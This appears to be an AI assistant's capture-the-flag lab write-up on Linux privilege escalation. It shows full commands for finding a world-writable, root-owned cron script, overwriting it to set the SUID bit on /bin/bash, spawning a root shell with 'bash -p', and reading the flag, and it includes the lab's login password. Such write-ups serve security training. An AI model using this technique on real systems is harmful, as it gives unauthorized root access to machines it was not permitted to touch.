# crontab

Niceee 🔥 root + flag already, GG.

Here’s the **clean step-by-step writeup** for this lab (from recon → root → flag) you can reuse / review.

---

## 1️⃣ Initial Access

Login as the low-privileged user:

```bash
ssh noob@<ip> -p 4200
# password: N00bP@ssw0rd

```

Check who you are:

```bash
whoami
id

```

---

## 2️⃣ Enumerate Cron & Scheduled Tasks

First, check if this user has its own crontab:

```bash
crontab -l
# no crontab for noob

```

Then look at system-wide cron configuration:

```bash
ls -al /etc/cron*
cat /etc/crontab

```

You see standard entries only (hourly/daily/weekly/monthly), nothing custom.

According to the lab hint, there should be some script being run regularly, so we look for **files we can write**.

---

## 3️⃣ Find World-Writable Files (Possible Misconfig)

Search for world-writable files:

```bash
find / -type f -perm -o+w 2>/dev/null

```

Relevant result:

```bash
/home/noob/clean_temp.sh

```

Check its permissions:

```bash
ls -al clean_temp.sh

```

Output:

```
-rwxrwxrwx 1 root root 58 Jul 18  2022 clean_temp.sh

```

👉 **Owner: root:root, perms: 777**

So this is a **root-owned script that anyone can edit** → classic privilege escalation bug.

Look inside:

```bash
cat clean_temp.sh

```

Content:

```bash
#!/bin/bash

### Clean /tmp in every 5 minutes

rm /tmp/*

```

The comment says it runs **every 5 minutes** → likely by a cron job as root.

Even though we don’t directly see the cron entry (hidden in lab infra), we know:

- root runs this script periodically
- we (noob) can edit it

Perfect target.

---

## 4️⃣ Replace Script Content with a PrivEsc Payload

Goal: when root’s cron runs this script, it should **give us a way to become root**.

Easiest: make `/bin/bash` SUID, so we can later run `bash -p` and get a root shell.

Overwrite the script:

```bash
echo -e '#!/bin/bash\nchmod +s /bin/bash' > clean_temp.sh
cat clean_temp.sh

```

Now `clean_temp.sh` contains:

```bash
#!/bin/bash
chmod +s /bin/bash

```

Permissions are still 777, owned by root:

```bash
ls -al clean_temp.sh
# -rwxrwxrwx 1 root root 58 ... clean_temp.sh

```

---

## 5️⃣ Wait for Cron to Execute

Cron (running as root) will execute `clean_temp.sh` “every 5 minutes” as per the script comment.

After waiting a bit, check `/bin/bash` permissions:

```bash
ls -al /bin/bash

```

You want to see:

```
-rwsr-sr-x 1 root root 1037528 Jul 12  2019 /bin/bash
      ^
      s here = SUID bit set for owner (root)

```

That means:

- binary owned by root
- when any user executes it, it runs with **effective UID = root**

---

## 6️⃣ Get a Root Shell via SUID bash

Now just run:

```bash
/bin/bash -p

```

Check your IDs:

```bash
id

```

You should see something like:

```
uid=1000(noob) gid=1000(noob) euid=0(root) egid=0(root) groups=0(root),1000(noob)

```

📌 Important point:

- **uid = 1000** (real user still noob)
- **euid = 0** → process is executing with **root privileges**
    
    So you effectively have a root shell.
    

---

## 7️⃣ Read the Flag in /root

Now you can access `/root`:

```bash
cd /root
ls
cat flag_NjAxZ.txt

```

Example:

```
system{yvMGuKvdbj}

```

That’s your flag ✅

---

## 8️⃣ (Optional) Cleanup

In a real environment you’d clean traces:

- Restore `clean_temp.sh` to original content
- Remove SUID from `/bin/bash`:

```bash
chmod u-s /bin/bash

```

---

### 🔁 Summary Flow

1. Login as `noob`
2. Enum cron & writable files → find `/home/noob/clean_temp.sh` (777, root:root)
3. Confirm it’s a periodic clean script run by root
4. Overwrite it with:
    
    ```bash
    #!/bin/bash
    chmod +s /bin/bash
    
    ```
    
5. Wait for cron to run
6. Confirm SUID: `ls -al /bin/bash` → `rwsr-sr-x`
7. Run `/bin/bash -p` → root shell (euid=0)
8. `cd /root && cat flag_*`

ถ้าอยากได้ version ภาษาไทยล้วนๆ ไว้เป็น writeup ส่งเพื่อน/สรุปเก็บไว้ เดี๋ยวผมจัดให้ต่อได้เลย 🙌